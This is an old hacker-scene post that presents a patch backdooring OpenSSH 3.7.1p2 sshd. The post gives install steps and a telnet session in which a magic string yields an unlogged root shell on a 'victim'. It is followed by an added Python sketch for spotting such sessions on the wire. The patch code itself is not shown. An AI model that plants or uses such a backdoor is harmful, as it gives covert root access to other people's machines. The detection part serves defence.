OpenSSH backdoor


In the good old days I made a very simple but nice sshd backdoor for the old sshd 1.2.xx. Now it's time for something even more lame, but in the old, good Lam3rZ style as well! :)

osshd-3.7.1p2-backdoor1.diff - it's a patch for current openssh.

How to use it?
You know how to patch sources, don't you? :)
Change the #define EVIL "LETMEIN" to any evil, magic string you like, patch the openssh sources, rebuild and install.
The usage is rather simple, see below:
root@evil(chroot):~# telnet victim 22
Trying x.x.x.x...
Connected to victim.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.7.1p2
LETMEIN
sh: no job control in this shell

Shift to the left,
Shift to the right,
Mask in, mask out,
BYTE, BYTE, BYTE !!!

root@victim:/# ^]
telnet> mode c

root@victim:/# 
Here comes the explanation:
First you connect to the ssh port (22, preferably ;), then you type the magic string ("LETMEIN" in this case) and the login shell gets spawned. To get terminal capabilities you need to switch telnet to 'character' mode, so press the CTRL-] (^]) escape sequence and type "mode character" or "mode c".
At this point you have a very nice terminal! Some features are missing, but I leave it up to you as an exercise; believe me, it's very easy ;) Besides that, you may not even notice what's wrong...

Why is it done this way?

The main reason is that at the very beginning of the handshake there is no logging. Not even connection logging, so you're entering the victim's environment silently...
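Because the trigger fires before sshd logs anything, host logs are not where this shows up; the wire is. The thing the backdoor changes is visible in the very first bytes of the session: a genuine SSH client opens with an identification string of the form "SSH-protoversion-softwareversion" (RFC 4253), while the session above opens with "LETMEIN". The following detection sketch is an added example, not part of the original text or patch; it runs over constructed flow summaries (client first line, server byte count, duration) of the kind an IDS or flow collector could produce, and the thresholds and the Flow record layout are assumptions.

```python
"""Flag SSH-port flows whose client never sent an RFC 4253 identification string.

Added example (not the original author's code). The flows below are constructed
sample data; the field names and thresholds are assumptions, not any tool's API.
"""
from dataclasses import dataclass


@dataclass
class Flow:
    """One TCP flow to an SSH port, as a collector might summarise it."""
    client: str
    server_port: int
    client_first_line: bytes   # first line the client sent after connecting
    server_bytes: int          # bytes the server sent over the whole flow
    duration_s: float


def is_ssh_ident(line: bytes) -> bool:
    """RFC 4253 s4.2: 'SSH-' protoversion '-' softwareversion [SP comments] CR LF."""
    line = line.rstrip(b"\r\n")
    if not line.startswith(b"SSH-"):
        return False
    parts = line.split(b"-", 2)        # ["SSH", "1.99", "OpenSSH_3.7.1p2"]
    return len(parts) == 3 and all(parts[1:])


def classify(flow: Flow) -> str:
    """'ok', 'non_ssh_client' (scanner/junk) or 'backdoor_suspect'."""
    if flow.server_port != 22 or is_ssh_ident(flow.client_first_line):
        return "ok"
    # A stock sshd rejects a non-identification line and closes almost at once,
    # so the flow is short and the server sends only a few bytes. A flow that
    # stays open and keeps streaming server data after such a line is what an
    # interactive shell looks like on the wire.
    if flow.duration_s > 5 and flow.server_bytes > 512:
        return "backdoor_suspect"
    return "non_ssh_client"


def suspicious_flows(flows):
    """Return (client, verdict) for every flow that is not a normal SSH handshake."""
    verdicts = [(f.client, classify(f)) for f in flows]
    return [(c, v) for c, v in verdicts if v != "ok"]


# Constructed sample flows: one normal client, one scanner, one backdoor session.
SAMPLE_FLOWS = [
    Flow("10.0.0.5", 22, b"SSH-2.0-OpenSSH_9.6\r\n", 2048, 12.0),
    Flow("10.0.0.9", 22, b"GET / HTTP/1.0\r\n", 19, 0.1),
    Flow("10.0.0.7", 22, b"LETMEIN\n", 4096, 90.0),
]

if __name__ == "__main__":
    for client, verdict in suspicious_flows(SAMPLE_FLOWS):
        print(f"{client}: {verdict}")
```

The first-line check alone would also fire on port scanners and misdirected HTTP clients, which is why the verdict is split: only a non-SSH opening followed by a long-lived, chatty flow is escalated. Since the patch requires rebuilding sshd, comparing the installed binary against the distribution package is the complementary host-side check.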